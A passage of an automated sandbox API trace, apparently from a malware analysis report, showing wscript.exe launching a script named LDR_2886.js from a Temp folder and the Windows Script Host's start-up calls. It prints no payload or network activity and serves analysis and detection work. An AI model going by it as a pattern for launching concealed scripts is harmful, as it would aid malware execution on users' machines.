	[0088.389] Release () returned 0x1
	[0088.390] realloc (_Block=0x482b40, _Size=0x140) returned 0x4de440
	[0088.391] MulDiv (nNumber=958, nNumerator=100, nDenominator=3511) returned 27
	[0088.391] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.391] GetTickCount () returned 0x26b21
	[0088.590] MulDiv (nNumber=942, nNumerator=100, nDenominator=3617) returned 26
	[0088.590] IUnknown:Release (This=0x34f420) returned 0x1
	[0088.590] GetTickCount () returned 0x26beb
	[0088.593] FindResourceA (hModule=0x7fee13d0000, lpName=0x2, lpType=0x6) returned 0x120718
	[0088.593] LoadResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x120b6c
	[0088.593] LockResource (hResData=0x120b6c) returned 0x120b6c
	[0088.593] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x120718) returned 0x86
	[0088.593] FreeResource (hResData=0x120b6c) returned 0
	[0088.594] FindResourceA (hModule=0x7fee13d0000, lpName=0x101, lpType=0x6) returned 0x1207e8
	[0088.594] LoadResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0x121c74
	[0088.594] LockResource (hResData=0x121c74) returned 0x121c74
	[0088.594] SizeofResource (hModule=0x7fee13d0000, hResInfo=0x1207e8) returned 0xce
	[0088.594] FreeResource (hResData=0x121c74) returned 0
	[0088.594] bsearch (_Key=0x143398, _Base=0x7fee149a3c0, _NumOfElements=0x5d, _SizeOfElements=0x8, _PtFuncCompare=0x7fee14281a0) returned 0x7fee149a410
	[0090.515] SendMessageA (hWnd=0x3023a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0090.517] SendMessageA (hWnd=0x3023a, Msg=0x402, wParam=0x0, lParam=0x0) returned 0x0
	[0090.517] PostMessageA (hWnd=0x3023a, Msg=0x12, wParam=0x0, lParam=0x0) returned 1
	[0090.519] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x22fa10*=0xd4, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0090.519] CloseHandle (hObject=0xd4) returned 1
	[0090.519] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.519] IUnknown:Release (This=0x35e5f0) returned 0x0
	[0090.519] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.519] IUnknown:Release (This=0x35e6a0) returned 0x0
	[0090.519] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.519] IUnknown:Release (This=0x35e750) returned 0x0
	[0090.519] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.519] IUnknown:Release (This=0x35e540) returned 0x0
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] GetProcessHeap () returned 0x330000
	[0090.520] HeapFree (in: hHeap=0x330000, dwFlags=0x0, lpMem=0x39a5e0 | out: hHeap=0x330000) returned 1
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] CoRegisterMessageFilter (in: lpMessageFilter=0x0, lplpMessageFilter=0x22fa40 | out: lplpMessageFilter=0x22fa40*=0x305f80) returned 0x0
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] ??3@YAXPEAX@Z () returned 0x4b13c601
	[0090.520] CoUninitialize () 
	[0090.520] DllCanUnloadNow () returned 0x0
	[0090.520] DllCanUnloadNow () 

Thread:
	id = 193
	os_tid = 0x9fc


Thread:
	id = 195
	os_tid = 0x40c

	[0083.970] GetClassInfoA (in: hInstance=0xff6b0000, lpClassName="WSH-Timer", lpWndClass=0x274f9e0 | out: lpWndClass=0x274f9e0) returned 0
	[0083.971] RegisterClassA (lpWndClass=0x274f9e0) returned 0x9006ac138
	[0083.971] CreateWindowExA (dwExStyle=0x0, lpClassName="WSH-Timer", lpWindowName=0x0, dwStyle=0x0, X=0, Y=0, nWidth=1, nHeight=1, hWndParent=0x0, hMenu=0x0, hInstance=0xff6b0000, lpParam=0x305a60) returned 0x3023a
	[0083.971] GetWindowLongPtrA (hWnd=0x3023a, nIndex=-21) returned 0x0
	[0083.971] NtdllDefWindowProc_A (hWnd=0x3023a, Msg=0x24, wParam=0x0, lParam=0x274f3d0) returned 0x0
	[0083.971] GetWindowLongPtrA (hWnd=0x3023a, nIndex=-21) returned 0x0
	[0083.971] SetWindowLongPtrA (hWnd=0x3023a, nIndex=-21, dwNewLong=0x305a60) returned 0x0
	[0083.971] NtdllDefWindowProc_A (hWnd=0x3023a, Msg=0x81, wParam=0x0, lParam=0x274f390) returned 0x1
	[0083.973] GetWindowLongPtrA (hWnd=0x3023a, nIndex=-21) returned 0x305a60
	[0083.973] NtdllDefWindowProc_A (hWnd=0x3023a, Msg=0x83, wParam=0x0, lParam=0x274f3f0) returned 0x0
	[0083.975] GetWindowLongPtrA (hWnd=0x3023a, nIndex=-21) returned 0x305a60
	[0083.975] NtdllDefWindowProc_A (hWnd=0x3023a, Msg=0x1, wParam=0x0, lParam=0x274f390) returned 0x0
	[0083.975] SetEvent (hEvent=0xcc) returned 1
	[0084.015] GetMessageA (in: lpMsg=0x274f9b0, hWnd=0x3023a, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x274f9b0) returned 0
	[0090.515] GetWindowLongPtrA (hWnd=0x3023a, nIndex=-21) returned 0x305a60
	[0090.517] GetWindowLongPtrA (hWnd=0x3023a, nIndex=-21) returned 0x305a60

Thread:
	id = 199
	os_tid = 0xb0c


Thread:
	id = 200
	os_tid = 0x9ec


Thread:
	id = 201
	os_tid = 0xa00


Thread:
	id = 207
	os_tid = 0x500


Thread:
	id = 208
	os_tid = 0x70c


Thread:
	id = 215
	os_tid = 0x820


Thread:
	id = 221
	os_tid = 0xb00


Process:
	id = "25"
	image_name = "wscript.exe"
	filename = "c:\\windows\\system32\\wscript.exe"
	page_root = "0x4d430000"
	os_pid = "0x154"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "1"
	os_parent_pid = "0x910"
	cmd_line = "\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	cur_dir = "C:\\Users\\aETAdzjz\\Documents\\"
	os_username = "YKYD69Q\\aETAdzjz"
	bitness = "64"
	os_groups = "YKYD69Q\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000e8ca" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 213
	os_tid = 0xb9c

	[0088.944] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2ffda0 | out: lpSystemTimeAsFileTime=0x2ffda0*(dwLowDateTime=0xad5ca730, dwHighDateTime=0x1d543d1)) 
	[0088.944] GetCurrentProcessId () returned 0x154
	[0088.944] GetCurrentThreadId () returned 0xb9c
	[0088.944] GetTickCount () returned 0x26d52
	[0088.944] QueryPerformanceCounter (in: lpPerformanceCount=0x2ffda8 | out: lpPerformanceCount=0x2ffda8*=21336999126) returned 1
	[0088.944] GetStartupInfoA (in: lpStartupInfo=0x2ffdc0 | out: lpStartupInfo=0x2ffdc0*(cb=0x68, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\System32\\WScript.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0xffffffffffffffff, hStdOutput=0xffffffffffffffff, hStdError=0xffffffffffffffff)) 
	[0088.945] GetModuleHandleA (lpModuleName=0x0) returned 0xff6b0000
	[0088.945] GetModuleHandleA (lpModuleName=0x0) returned 0xff6b0000
	[0088.945] GetVersionExA (in: lpVersionInformation=0x2ffce0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x0, dwMinorVersion=0x421eb0, dwBuildNumber=0x0, dwPlatformId=0x0, szCSDVersion="") | out: lpVersionInformation=0x2ffce0*(dwOSVersionInfoSize=0x94, dwMajorVersion=0x6, dwMinorVersion=0x1, dwBuildNumber=0x1db1, dwPlatformId=0x2, szCSDVersion="Service Pack 1")) returned 1
	[0088.945] GetUserDefaultLCID () returned 0x409
	[0088.947] CoInitialize (pvReserved=0x0) returned 0x0
	[0088.958] GetCommandLineW () returned="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" "
	[0088.958] lstrlenW (lpString="\"C:\\Windows\\System32\\WScript.exe\" \"C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js\" ") returned 85
	[0088.958] ??2@YAPEAX_K@Z () returned 0x1957b0
	[0088.958] ??2@YAPEAX_K@Z () returned 0x195f60
	[0088.958] GetCurrentThreadId () returned 0xb9c
	[0088.959] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ffa28 | out: phkResult=0x2ffa28*=0x7c) returned 0x0
	[0088.959] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ffa20 | out: phkResult=0x2ffa20*=0x80) returned 0x0
	[0088.959] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fed28, lpData=0x2ff130, lpcbData=0x2fed20*=0x400 | out: lpType=0x2fed28*=0x0, lpData=0x2ff130*=0x67, lpcbData=0x2fed20*=0x400) returned 0x2
	[0088.959] RegQueryValueExW (in: hKey=0x7c, lpValueName="Enabled", lpReserved=0x0, lpType=0x2fed28, lpData=0x2ff130, lpcbData=0x2fed20*=0x400 | out: lpType=0x2fed28*=0x0, lpData=0x2ff130*=0x67, lpcbData=0x2fed20*=0x400) returned 0x2
	[0088.959] RegQueryValueExW (in: hKey=0x80, lpValueName="Enabled", lpReserved=0x0, lpType=0x2fed28, lpData=0x2ff130, lpcbData=0x2fed20*=0x400 | out: lpType=0x2fed28*=0x0, lpData=0x2ff130*=0x67, lpcbData=0x2fed20*=0x400) returned 0x2
	[0088.959] CoInitializeSecurity (pSecDesc=0x0, cAuthSvc=-1, asAuthSvc=0x0, pReserved1=0x0, dwAuthnLevel=0x0, dwImpLevel=0x3, pAuthList=0x0, dwCapabilities=0x0, pReserved3=0x0) returned 0x0
	[0089.832] RegCloseKey (hKey=0x80) returned 0x0
	[0089.833] RegCloseKey (hKey=0x7c) returned 0x0
	[0089.833] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff740 | out: phkResult=0x2ff740*=0x7c) returned 0x0
	[0089.833] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff738 | out: phkResult=0x2ff738*=0x80) returned 0x0
	[0089.833] RegQueryValueExW (in: hKey=0x80, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fea48, lpData=0x2fee50, lpcbData=0x2fea40*=0x400 | out: lpType=0x2fea48*=0x0, lpData=0x2fee50*=0x0, lpcbData=0x2fea40*=0x400) returned 0x2
	[0089.833] RegQueryValueExW (in: hKey=0x7c, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2fea48, lpData=0x2fee50, lpcbData=0x2fea40*=0x400 | out: lpType=0x2fea48*=0x0, lpData=0x2fee50*=0x0, lpcbData=0x2fea40*=0x400) returned 0x2
	[0089.833] RegQueryValueExW (in: hKey=0x80, lpValueName="LogSecuritySuccesses", lpReserved=0x0, lpType=0x2fea48, lpData=0x2fee50, lpcbData=0x2fea40*=0x400 | out: lpType=0x2fea48*=0x0, lpData=0x2fee50*=0x0, lpcbData=0x2fea40*=0x400) returned 0x2
	[0089.833] RegCloseKey (hKey=0x80) returned 0x0
	[0089.833] RegCloseKey (hKey=0x7c) returned 0x0
	[0089.833] GetACP () returned 0x4e4
	[0089.833] LoadLibraryA (lpLibFileName="kernel32.dll") returned 0x77040000
	[0089.833] GetProcAddress (hModule=0x77040000, lpProcName="HeapSetInformation") returned 0x7705c4a0
	[0089.833] HeapSetInformation (HeapHandle=0x0, HeapInformationClass=0x1, HeapInformation=0x0, HeapInformationLength=0x0) returned 1
	[0089.833] FreeLibrary (hLibModule=0x77040000) returned 1
	[0089.833] ??2@YAPEAX_K@Z () returned 0x195f80
	[0089.834] CoRegisterMessageFilter (in: lpMessageFilter=0x195f80, lplpMessageFilter=0x195f90 | out: lplpMessageFilter=0x195f90*=0x0) returned 0x0
	[0089.834] GetModuleFileNameW (in: hModule=0xff6b0000, lpFilename=0x2ffa80, nSize=0x105 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0089.834] GetFileVersionInfoSizeW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", lpdwHandle=0x2ff3d0 | out: lpdwHandle=0x2ff3d0) returned 0x704
	[0089.835] GetFileVersionInfoW (in: lptstrFilename="C:\\Windows\\System32\\WScript.exe", dwHandle=0x0, dwLen=0x704, lpData=0x2fecc0 | out: lpData=0x2fecc0) returned 1
	[0089.835] VerQueryValueW (in: pBlock=0x2fecc0, lpSubBlock="\\", lplpBuffer=0x2ff3d8, puLen=0x2ff3d4 | out: lplpBuffer=0x2ff3d8*=0x2fece8, puLen=0x2ff3d4) returned 1
	[0089.835] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff428 | out: phkResult=0x2ff428*=0x7c) returned 0x0
	[0089.835] RegQueryValueExW (in: hKey=0x7c, lpValueName="IgnoreUserSettings", lpReserved=0x0, lpType=0x2fe778, lpData=0x2feb80, lpcbData=0x2fe770*=0x400 | out: lpType=0x2fe778*=0x0, lpData=0x2feb80*=0x0, lpcbData=0x2fe770*=0x400) returned 0x2
	[0089.835] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", ulOptions=0x0, samDesired=0x20019, phkResult=0x2ff3e0 | out: phkResult=0x2ff3e0*=0x80) returned 0x0
	[0089.835] RegQueryValueExW (in: hKey=0x80, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ff3a4, lpData=0x2ff420, lpcbData=0x2ff3a0*=0x4 | out: lpType=0x2ff3a4*=0x0, lpData=0x2ff420*=0x50, lpcbData=0x2ff3a0*=0x4) returned 0x2
	[0089.835] RegQueryValueExW (in: hKey=0x80, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2fe778, lpData=0x2feb80, lpcbData=0x2fe770*=0x400 | out: lpType=0x2fe778*=0x0, lpData=0x2feb80*=0x0, lpcbData=0x2fe770*=0x400) returned 0x2
	[0089.835] RegQueryValueExW (in: hKey=0x7c, lpValueName="TrustPolicy", lpReserved=0x0, lpType=0x2ff3a4, lpData=0x2ff420, lpcbData=0x2ff3a0*=0x4 | out: lpType=0x2ff3a4*=0x0, lpData=0x2ff420*=0x50, lpcbData=0x2ff3a0*=0x4) returned 0x2
	[0089.835] RegQueryValueExW (in: hKey=0x7c, lpValueName="UseWINSAFER", lpReserved=0x0, lpType=0x2fe778, lpData=0x2feb80, lpcbData=0x2fe770*=0x400 | out: lpType=0x2fe778*=0x1, lpData="1", lpcbData=0x2fe770*=0x4) returned 0x0
	[0089.835] lstrlenW (lpString="1") returned 1
	[0089.836] lstrlenW (lpString="0") returned 1
	[0089.836] lstrlenW (lpString="1") returned 1
	[0089.836] lstrlenW (lpString="no") returned 2
	[0089.836] lstrlenW (lpString="1") returned 1
	[0089.836] lstrlenW (lpString="false") returned 5
	[0089.836] RegCloseKey (hKey=0x80) returned 0x0
	[0089.836] RegCloseKey (hKey=0x7c) returned 0x0
	[0089.836] RegCreateKeyExW (in: hKey=0xffffffff80000002, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ff428, lpdwDisposition=0x0 | out: phkResult=0x2ff428*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0089.836] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ff3c4, lpData=0x2ff420, lpcbData=0x2ff3c0*=0x4 | out: lpType=0x2ff3c4*=0x0, lpData=0x2ff420*=0x50, lpcbData=0x2ff3c0*=0x4) returned 0x2
	[0089.836] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2fe798, lpData=0x2feba0, lpcbData=0x2fe790*=0x400 | out: lpType=0x2fe798*=0x1, lpData="1", lpcbData=0x2fe790*=0x4) returned 0x0
	[0089.836] lstrlenW (lpString="1") returned 1
	[0089.836] lstrlenW (lpString="0") returned 1
	[0089.836] lstrlenW (lpString="1") returned 1
	[0089.836] lstrlenW (lpString="no") returned 2
	[0089.836] lstrlenW (lpString="1") returned 1
	[0089.836] lstrlenW (lpString="false") returned 5
	[0089.836] RegCloseKey (hKey=0x7c) returned 0x0
	[0089.836] RegCreateKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Software\\Microsoft\\Windows Script Host\\Settings", Reserved=0x0, lpClass=0x0, dwOptions=0x0, samDesired=0x20019, lpSecurityAttributes=0x0, phkResult=0x2ff428, lpdwDisposition=0x0 | out: phkResult=0x2ff428*=0x7c, lpdwDisposition=0x0) returned 0x0
	[0089.836] RegQueryValueExW (in: hKey=0x7c, lpValueName="Timeout", lpReserved=0x0, lpType=0x2ff3c4, lpData=0x2ff420, lpcbData=0x2ff3c0*=0x4 | out: lpType=0x2ff3c4*=0x0, lpData=0x2ff420*=0x50, lpcbData=0x2ff3c0*=0x4) returned 0x2
	[0089.836] RegQueryValueExW (in: hKey=0x7c, lpValueName="DisplayLogo", lpReserved=0x0, lpType=0x2fe798, lpData=0x2feba0, lpcbData=0x2fe790*=0x400 | out: lpType=0x2fe798*=0x0, lpData=0x2feba0*=0x31, lpcbData=0x2fe790*=0x400) returned 0x2
	[0089.836] RegCloseKey (hKey=0x7c) returned 0x0
	[0089.836] lstrlenW (lpString="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js") returned 48
	[0089.836] lstrlenW (lpString="js") returned 2
	[0089.836] lstrlenW (lpString="WSH") returned 3
	[0089.836] ??2@YAPEAX_K@Z () returned 0x195870
	[0089.837] LoadStringW (in: hInstance=0xff6b0000, uID=0x9c5, lpBuffer=0x2fde90, cchBufferMax=2048 | out: lpBuffer="Windows Script Host") returned 0x13
	[0089.837] LoadTypeLib (in: szFile="C:\\Windows\\System32\\WScript.exe", pptlib=0x2feed0*=0x0 | out: pptlib=0x2feed0*=0x44d100) returned 0x0
	[0089.842] ITypeLib:GetTypeInfoOfGuid (in: This=0x44d100, GUID=0xff6b58f0, ppTInfo=0x2feeb8 | out: ppTInfo=0x2feeb8*=0x44e4e8) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeOfImplType (in: This=0x44e4e8, index=0xffffffff, pRefType=0x2feeb0 | out: pRefType=0x2feeb0*=0xfffffffe) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeInfo (in: This=0x44e4e8, hreftype=0xfffffffe, ppTInfo=0xff6cf458 | out: ppTInfo=0xff6cf458*=0x44e540) returned 0x0
	[0089.844] IUnknown:Release (This=0x44e4e8) returned 0x1
	[0089.844] ??2@YAPEAX_K@Z () returned 0x195900
	[0089.844] ??2@YAPEAX_K@Z () returned 0x1959a0
	[0089.844] ??2@YAPEAX_K@Z () returned 0x195a00
	[0089.844] ITypeLib:GetTypeInfoOfGuid (in: This=0x44d100, GUID=0xff6b5950, ppTInfo=0x2feeb8 | out: ppTInfo=0x2feeb8*=0x44e598) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeOfImplType (in: This=0x44e598, index=0xffffffff, pRefType=0x2feeb0 | out: pRefType=0x2feeb0*=0xfffffffe) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeInfo (in: This=0x44e598, hreftype=0xfffffffe, ppTInfo=0xff6cf4d8 | out: ppTInfo=0xff6cf4d8*=0x44e5f0) returned 0x0
	[0089.844] IUnknown:Release (This=0x44e598) returned 0x1
	[0089.844] ITypeLib:GetTypeInfoOfGuid (in: This=0x44d100, GUID=0xff6b5960, ppTInfo=0x2feeb8 | out: ppTInfo=0x2feeb8*=0x44e648) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeOfImplType (in: This=0x44e648, index=0xffffffff, pRefType=0x2feeb0 | out: pRefType=0x2feeb0*=0xfffffffe) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeInfo (in: This=0x44e648, hreftype=0xfffffffe, ppTInfo=0xff6cf518 | out: ppTInfo=0xff6cf518*=0x44e6a0) returned 0x0
	[0089.844] IUnknown:Release (This=0x44e648) returned 0x1
	[0089.844] ITypeLib:GetTypeInfoOfGuid (in: This=0x44d100, GUID=0xff6b5910, ppTInfo=0x2feeb8 | out: ppTInfo=0x2feeb8*=0x44e6f8) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeOfImplType (in: This=0x44e6f8, index=0xffffffff, pRefType=0x2feeb0 | out: pRefType=0x2feeb0*=0xfffffffe) returned 0x0
	[0089.844] ITypeInfo:GetRefTypeInfo (in: This=0x44e6f8, hreftype=0xfffffffe, ppTInfo=0xff6cf498 | out: ppTInfo=0xff6cf498*=0x44e750) returned 0x0
	[0089.844] IUnknown:Release (This=0x44e6f8) returned 0x1
	[0089.844] IUnknown:Release (This=0x44d100) returned 0x4
	[0089.845] ??2@YAPEAX_K@Z () returned 0x195a60
	[0089.845] GetCurrentThreadId () returned 0xb9c
	[0089.845] CreateEventA (lpEventAttributes=0x0, bManualReset=0, bInitialState=0, lpName=0x0) returned 0xcc
	[0089.845] CreateThread (in: lpThreadAttributes=0x0, dwStackSize=0x0, lpStartAddress=0xff6c1cf8, lpParameter=0x195a60, dwCreationFlags=0x0, lpThreadId=0x195a88 | out: lpThreadId=0x195a88*=0x4d8) returned 0xd4
	[0089.845] MsgWaitForMultipleObjects (nCount=0x1, pHandles=0x2ff110*=0xcc, fWaitAll=0, dwMilliseconds=0xffffffff, dwWakeMask=0xff) returned 0x0
	[0089.988] CloseHandle (hObject=0xcc) returned 1
	[0089.988] GetFullPathNameW (in: lpFileName="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", nBufferLength=0x104, lpBuffer=0x2ff1a0, lpFilePart=0x2ff190 | out: lpBuffer="C:\\Users\\aETAdzjz\\AppData\\Local\\Temp\\LDR_2886.js", lpFilePart=0x2ff190*="LDR_2886.js") returned 0x30
	[0089.988] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey=".js", ulOptions=0x0, samDesired=0x20019, phkResult=0x2fe6b0 | out: phkResult=0x2fe6b0*=0xe6) returned 0x0
	[0089.988] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2fe660, lpData=0x2fe6c0, lpcbData=0x2fe664*=0x800 | out: lpType=0x2fe660*=0x1, lpData="JSFile", lpcbData=0x2fe664*=0xe) returned 0x0
	[0089.989] RegCloseKey (hKey=0xe6) returned 0x0
	[0089.989] RegOpenKeyExW (in: hKey=0xffffffff80000000, lpSubKey="JSFile\\ScriptEngine", ulOptions=0x0, samDesired=0x20019, phkResult=0x2fe6b0 | out: phkResult=0x2fe6b0*=0xe6) returned 0x0
	[0089.989] RegQueryValueExW (in: hKey=0xe6, lpValueName=0x0, lpReserved=0x0, lpType=0x2fe660, lpData=0x2fef30, lpcbData=0x2fe664*=0x200 | out: lpType=0x2fe660*=0x1, lpData="JScript", lpcbData=0x2fe664*=0x10) returned 0x0
	[0089.989] RegCloseKey (hKey=0xe6) returned 0x0
	[0089.989] ??2@YAPEAX_K@Z () returned 0x1963a0
	[0089.989] GetProcessHeap () returned 0x420000
	[0089.989] RtlAllocateHeap (HeapHandle=0x420000, Flags=0x0, Size=0x2000) returned 0x458430
	[0089.989] CLSIDFromString (in: lpsz="JScript", pclsid=0x2feea8 | out: pclsid=0x2feea8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58))) returned 0x0
	[0089.990] CoCreateInstance (rclsid=0x2feea8*(Data1=0xf414c260, Data2=0x6ac0, Data3=0x11cf, Data4=([0]=0xb6, [1]=0xd1, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0xbb, [6]=0xbb, [7]=0x58)), pUnkOuter=0x0, dwClsContext=0x17, riid=0xff6b1800*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2feea0) 
	[0089.998] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x2fd0a0 | out: lpSystemTimeAsFileTime=0x2fd0a0*(dwLowDateTime=0xadfc2350, dwHighDateTime=0x1d543d1)) 
	[0089.998] GetCurrentProcessId () returned 0x154
	[0089.998] GetCurrentThreadId () returned 0xb9c
	[0089.998] GetTickCount () returned 0x27167
	[0089.998] QueryPerformanceCounter (in: lpPerformanceCount=0x2fd0a8 | out: lpPerformanceCount=0x2fd0a8*=21442374941) returned 1
	[0089.998] malloc (_Size=0x100) returned 0x196670
	[0089.998] __dllonexit () returned 0x7fee1410728
	[0089.998] __dllonexit () returned 0x7fee1410780
	[0089.999] __dllonexit () returned 0x7fee1410750
	[0089.999] __dllonexit () returned 0x7fee14107b0
	[0089.999] LoadLibraryExA (lpLibFileName="ADVAPI32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefd710000
	[0089.999] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegisterTraceGuidsA") returned 0x7717f570
	[0089.999] EtwRegisterTraceGuidsA () returned 0x0
	[0089.999] EtwRegisterTraceGuidsA () returned 0x0
	[0090.000] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x2fcc90, nSize=0x104 | out: lpFilename="C:\\Windows\\System32\\WScript.exe" (normalized: "c:\\windows\\system32\\wscript.exe")) returned 0x1f
	[0090.000] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegOpenKeyExA") returned 0x7fefd72b5f0
	[0090.000] RegOpenKeyExA (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\Windows Script\\Features", ulOptions=0x0, samDesired=0x1, phkResult=0x2fcdf8 | out: phkResult=0x2fcdf8*=0x0) returned 0x2
	[0090.007] RegQueryValueExA (in: hKey=0x104, lpValueName="COM+Enabled", lpReserved=0x0, lpType=0x2fedd0, lpData=0x2fedc8, lpcbData=0x2fedc0*=0x4 | out: lpType=0x2fedd0*=0x4, lpData=0x2fedc8*=0x1, lpcbData=0x2fedc0*=0x4) returned 0x0
	[0090.007] GetProcAddress (hModule=0x7fefd710000, lpProcName="RegCloseKey") returned 0x7fefd730710
	[0090.007] RegCloseKey (hKey=0x104) returned 0x0
	[0090.007] GetModuleHandleA (lpModuleName="ole32.dll") returned 0x7fefea30000
	[0090.007] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoGetObjectContext") returned 0x7fefea4c920
	[0090.007] LoadLibraryExA (lpLibFileName="ole32.dll", hFile=0x0, dwFlags=0x0) returned 0x7fefea30000
	[0090.008] GetProcAddress (hModule=0x7fefea30000, lpProcName="CoCreateInstance") returned 0x7fefea57490
	[0090.008] CoCreateInstance (in: rclsid=0x7fee147cba0*(Data1=0x323, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), pUnkOuter=0x0, dwClsContext=0x1, riid=0x7fee147cd80*(Data1=0x146, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppv=0x2feda0 | out: ppv=0x2feda0*=0x7fefec0a1b0) returned 0x0
	[0090.009] ??2@YAPEAX_K@Z () returned 0x196b30
	[0090.009] ??2@YAPEAX_KHPEBDH@Z () returned 0x195af0
	[0090.009] ??2@YAPEAX_K@Z () returned 0x196bf0
	[0090.009] ??2@YAPEAX_K@Z () returned 0x196c50
	[0090.009] ??2@YAPEAX_K@Z () returned 0x197140
	[0090.010] GetEnvironmentVariableW (in: lpName="JS_PROFILER", lpBuffer=0x2fed60, nSize=0x27 | out: lpBuffer="") returned 0x0
	[0090.010] GetUserDefaultLCID () returned 0x409
	[0090.010] IsValidLocale (Locale=0x409, dwFlags=0x1) returned 1
